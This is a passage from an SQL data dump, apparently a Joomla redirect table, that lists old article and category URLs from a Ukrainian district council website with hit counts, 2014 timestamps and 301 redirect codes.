00:00:00',301),(503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-16 15:33:41','0000-00-00 00:00:00',301),(504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46&Itemid=85&lang=en','','','',8,0,'2014-09-16 15:33:48','0000-00-00 00:00:00',301),(505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=en','','','',78,0,'2014-09-16 15:34:25','0000-00-00 00:00:00',301),(506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57:--15042014-&Itemid=98&lang=uk','','','',13,0,'2014-09-16 15:34:28','0000-00-00 00:00:00',301),(507,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-16 15:34:34','0000-00-00 00:00:00',301),(508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-16 15:34:37','0000-00-00 00:00:00',301),(509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36&Itemid=70&lang=ru','','','',6,0,'2014-09-16 15:36:02','0000-00-00 00:00:00',301),(510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=uk','','','',11,0,'2014-09-16 15:36:20','0000-00-00 00:00:00',301),(511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47&Itemid=86&lang=en','','','',10,0,'2014-09-16 15:36:33','0000-00-00 00:00:00',301),(512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-16 15:39:22','0000-00-00 00:00:00',301),(513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 15:39:38','0000-00-00 00:00:00',301),(514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47:-21022013-&Itemid=86&lang=en','','','',18,0,'2014-09-16 15:40:03','0000-00-00 00:00:00',301),(515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=ru','','','',22,0,'2014-09-16 15:40:58','0000-00-00 00:00:00',301),(516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=en','','','',17,0,'2014-09-16 15:41:49','0000-00-00 00:00:00',301),(517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-16 15:42:46','0000-00-00 00:00:00',301),(518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=uk','','','',21,0,'2014-09-16 15:43:49','0000-00-00 00:00:00',301),(519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59:--20062014-&Itemid=107&lang=en','','','',6,0,'2014-09-16 15:45:25','0000-00-00 00:00:00',301),(520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-16 15:45:40','0000-00-00 00:00:00',301),(521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=uk','','','',23,0,'2014-09-16 15:52:07','0000-00-00 00:00:00',301),(522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=ru','','','',31,0,'2014-09-16 15:52:07','0000-00-00 00:00:00',301),(523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-16 15:52:11','0000-00-00 00:00:00',301),(524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',30,0,'2014-09-16 15:52:14','0000-00-00 00:00:00',301),(525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=ru','','','',8,0,'2014-09-16 15:52:33','0000-00-00 00:00:00',301),(526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54&Itemid=95&lang=uk','','','',17,0,'2014-09-16 15:52:53','0000-00-00 00:00:00',301),(527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=uk','','','',27,0,'2014-09-16 15:53:21','0000-00-00 00:00:00',301),(528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=ru','','','',30,0,'2014-09-16 15:54:30','0000-00-00 00:00:00',301),(529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',22,0,'2014-09-16 15:55:57','0000-00-00 00:00:00',301),(530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-16 16:03:39','0000-00-00 00:00:00',301),(531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11&Itemid=14&lang=uk','','','',26,0,'2014-09-16 16:08:34','0000-00-00 00:00:00',301),(532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56&Itemid=97&lang=uk','','','',16,0,'2014-09-16 16:12:38','0000-00-00 00:00:00',301),(533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53:--25102013-&Itemid=94&lang=uk','','','',10,0,'2014-09-16 16:26:31','0000-00-00 00:00:00',301),(534,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56:--03022014-&Itemid=97&lang=uk','','','',11,0,'2014-09-16 16:27:53','0000-00-00 00:00:00',301),(535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1367:-lr-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-16 16:29:06','0000-00-00 00:00:00',301),(536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53:--25102013-&Itemid=94&lang=ru','','','',10,0,'2014-09-16 16:29:14','0000-00-00 00:00:00',301),(537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-16 16:30:10','0000-00-00 00:00:00',301),(538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=uk','','','',29,0,'2014-09-16 16:30:33','0000-00-00 00:00:00',301),(539,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-16 16:30:35','0000-00-00 00:00:00',301),(540,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=914:2013-01-23-13-21-28&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-16 16:30:37','0000-00-00 00:00:00',301),(541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-16 16:30:40','0000-00-00 00:00:00',301),(542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',25,0,'2014-09-16 16:33:09','0000-00-00 00:00:00',301),(543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-09-16 16:33:14','0000-00-00 00:00:00',301),(544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-16 16:33:16','0000-00-00 00:00:00',301),(545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',25,0,'2014-09-16 16:33:32','0000-00-00 00:00:00',301),(546,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',18,0,'2014-09-16 16:34:11','0000-00-00 00:00:00',301),(547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=en','','','',26,0,'2014-09-16 16:34:13','0000-00-00 00:00:00',301),(548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-16 16:34:38','0000-00-00 00:00:00',301),(549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&Itemid=14&lang=ru','','','',17,0,'2014-09-16 16:35:16','0000-00-00 00:00:00',301),(550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',14,0,'2014-09-16 16:37:59','0000-00-00 00:00:00',301),(551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=en','','','',21,0,'2014-09-16 16:38:03','0000-00-00 00:00:00',301),(552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=uk','','','',20,0,'2014-09-16 16:38:07','0000-00-00 00:00:00',301),(553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1165:-2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',17,0,'2014-09-16 16:39:12','0000-00-00 00:00:00',301),(554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=en','','','',8,0,'2014-09-16 16:39:57','0000-00-00 00:00:00',301),(555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=54:--29112013-&Itemid=95&lang=en','','','',16,0,'2014-09-16 16:40:13','0000-00-00 00:00:00',301),(556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=en','','','',15,0,'2014-09-16 16:41:18','0000-00-00 00:00:00',301),(557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-16 16:41:35','0000-00-00 00:00:00',301),(558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',28,0,'2014-09-16 16:42:28','0000-00-00 00:00:00',301),(559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',2,0,'2014-09-16 16:42:59','0000-00-00 00:00:00',301),(560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',2,0,'2014-09-16 16:45:05','0000-00-00 00:00:00',301),(561,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-16 16:45:08','0000-00-00 00:00:00',301),(562,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-16 16:46:34','0000-00-00 00:00:00',301),(563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47&Itemid=86&lang=uk','','','',10,0,'2014-09-16 16:47:34','0000-00-00 00:00:00',301),(564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-16 16:47:38','0000-00-00 00:00:00',301),(565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=49&Itemid=88&lang=ru','','','',7,0,'2014-09-16 16:47:42','0000-00-00 00:00:00',301),(566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',24,0,'2014-09-16 16:49:32','0000-00-00 00:00:00',301),(567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=975:-2012-2015-&catid=49:--12042013-&Itemid=88&lang=en','','','',11,0,'2014-09-16 16:49:49','0000-00-00 00:00:00',301),(568,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57&Itemid=98&lang=uk','','','',10,0,'2014-09-16 16:50:03','0000-00-00 00:00:00',301),(569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-16 16:51:18','0000-00-00 00:00:00',301),(570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59&Itemid=107&lang=uk','','','',5,0,'2014-09-16 16:51:39','0000-00-00 00:00:00',301),(571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-16 16:51:55','0000-00-00 00:00:00',301),(572,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=uk','','','',5,0,'2014-09-16 16:52:34','0000-00-00 00:00:00',301),(573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=uk','','','',4,0,'2014-09-16 16:52:38','0000-00-00 00:00:00',301),(574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',18,0,'2014-09-16 17:04:31','0000-00-00 00:00:00',301),(575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-16 17:05:57','0000-00-00 00:00:00',301),(576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-16 17:06:13','0000-00-00 00:00:00',301),(577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',7,0,'2014-09-16 17:08:01','0000-00-00 00:00:00',301),(578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',24,0,'2014-09-16 17:08:36','0000-00-00 00:00:00',301),(579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=46:--21122012&Itemid=85&lang=uk','','','',3,0,'2014-09-16 17:08:40','0000-00-00 00:00:00',301),(580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=en','','','',19,0,'2014-09-16 17:11:48','0000-00-00 00:00:00',301),(581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=946:-l-r-2011-2015-&catid=49&Itemid=88&lang=ru','','','',13,0,'2014-09-16 17:12:19','0000-00-00 00:00:00',301),(582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',13,0,'2014-09-16 17:13:54','0000-00-00 00:00:00',301),(583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-16 17:14:40','0000-00-00 00:00:00',301),(584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-16 17:16:10','0000-00-00 00:00:00',301),(585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=3:2010-06-05-12-50-56&layout=blog&Itemid=7&lang=uk','','','',5,0,'2014-09-16 17:16:12','0000-00-00 00:00:00',301),(586,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=uk','','','',11,0,'2014-09-16 17:16:14','0000-00-00 00:00:00',301),(587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-16 17:16:44','0000-00-00 00:00:00',301),(588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=36&Itemid=70&lang=ru','','','',17,0,'2014-09-16 17:23:15','0000-00-00 00:00:00',301),(589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11&Itemid=14&lang=en','','','',15,0,'2014-09-16 17:25:54','0000-00-00 00:00:00',301),(590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-16 17:27:16','0000-00-00 00:00:00',301),(591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=uk','','','',43,0,'2014-09-16 17:33:45','0000-00-00 00:00:00',301),(592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-16 17:34:18','0000-00-00 00:00:00',301),(593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&Itemid=14&lang=uk','','','',22,0,'2014-09-16 17:34:59','0000-00-00 00:00:00',301),(594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=en&Itemid=','','','',10,0,'2014-09-16 17:35:34','0000-00-00 00:00:00',301),(595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=36&Itemid=70&lang=uk','','','',7,0,'2014-09-16 17:36:22','0000-00-00 00:00:00',301),(596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-16 17:36:34','0000-00-00 00:00:00',301),(597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-16 17:36:58','0000-00-00 00:00:00',301),(598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-16 17:39:41','0000-00-00 00:00:00',301),(599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',19,0,'2014-09-16 17:42:03','0000-00-00 00:00:00',301),(600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-16 17:42:15','0000-00-00 00:00:00',301),(601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-16 17:47:12','0000-00-00 00:00:00',301),(602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47:-21022013-&Itemid=86&lang=ru','','','',18,0,'2014-09-16 17:47:39','0000-00-00 00:00:00',301),(603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=en','','','',8,0,'2014-09-16 17:48:08','0000-00-00 00:00:00',301),(604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=998:1&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-16 17:48:58','0000-00-00 00:00:00',301),(605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',14,0,'2014-09-16 17:50:38','0000-00-00 00:00:00',301),(606,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:------l---28r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',9,0,'2014-09-16 17:51:12','0000-00-00 00:00:00',301),(607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-16 17:52:06','0000-00-00 00:00:00',301),(608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-16 17:52:09','0000-00-00 00:00:00',301),(609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=ru','','','',13,0,'2014-09-16 17:53:04','0000-00-00 00:00:00',301),(610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',22,0,'2014-09-16 17:56:15','0000-00-00 00:00:00',301),(611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-16 17:56:34','0000-00-00 00:00:00',301),(612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-16 17:56:40','0000-00-00 00:00:00',301),(613,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-16 17:56:54','0000-00-00 00:00:00',301),(614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-16 17:57:37','0000-00-00 00:00:00',301),(615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=en','','','',9,0,'2014-09-16 17:57:59','0000-00-00 00:00:00',301),(616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-16 17:58:59','0000-00-00 00:00:00',301),(617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-16 17:59:21','0000-00-00 00:00:00',301),(618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-09-16 18:00:22','0000-00-00 00:00:00',301),(619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=en','','','',21,0,'2014-09-16 18:00:49','0000-00-00 00:00:00',301),(620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=57&Itemid=98&lang=uk','','','',8,0,'2014-09-16 18:00:50','0000-00-00 00:00:00',301),(621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=uk','','','',9,0,'2014-09-16 18:01:03','0000-00-00 00:00:00',301),(622,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=uk','','','',12,0,'2014-09-16 18:02:21','0000-00-00 00:00:00',301),(623,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=uk','','','',6,0,'2014-09-16 18:02:25','0000-00-00 00:00:00',301),(624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk','','','',9,0,'2014-09-16 18:03:20','0000-00-00 00:00:00',301),(625,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',21,0,'2014-09-16 18:03:25','0000-00-00 00:00:00',301),(626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-16 18:04:32','0000-00-00 00:00:00',301),(627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51:--19072013-&Itemid=92&lang=en','','','',4,0,'2014-09-16 18:05:53','0000-00-00 00:00:00',301),(628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-16 18:08:39','0000-00-00 00:00:00',301),(629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',15,0,'2014-09-16 18:11:24','0000-00-00 00:00:00',301),(630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-16 18:12:48','0000-00-00 00:00:00',301),(631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58:--30042014-&Itemid=105&lang=en','','','',8,0,'2014-09-16 18:13:41','0000-00-00 00:00:00',301),(632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-16 18:14:09','0000-00-00 00:00:00',301),(633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-16 18:14:11','0000-00-00 00:00:00',301),(634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-16 18:18:24','0000-00-00 00:00:00',301),(635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=ru','','','',15,0,'2014-09-16 18:18:43','0000-00-00 00:00:00',301),(636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&Itemid=14&lang=uk','','','',30,0,'2014-09-16 18:19:42','0000-00-00 00:00:00',301),(637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-16 18:20:02','0000-00-00 00:00:00',301),(638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-16 18:21:06','0000-00-00 00:00:00',301),(639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-16 18:21:23','0000-00-00 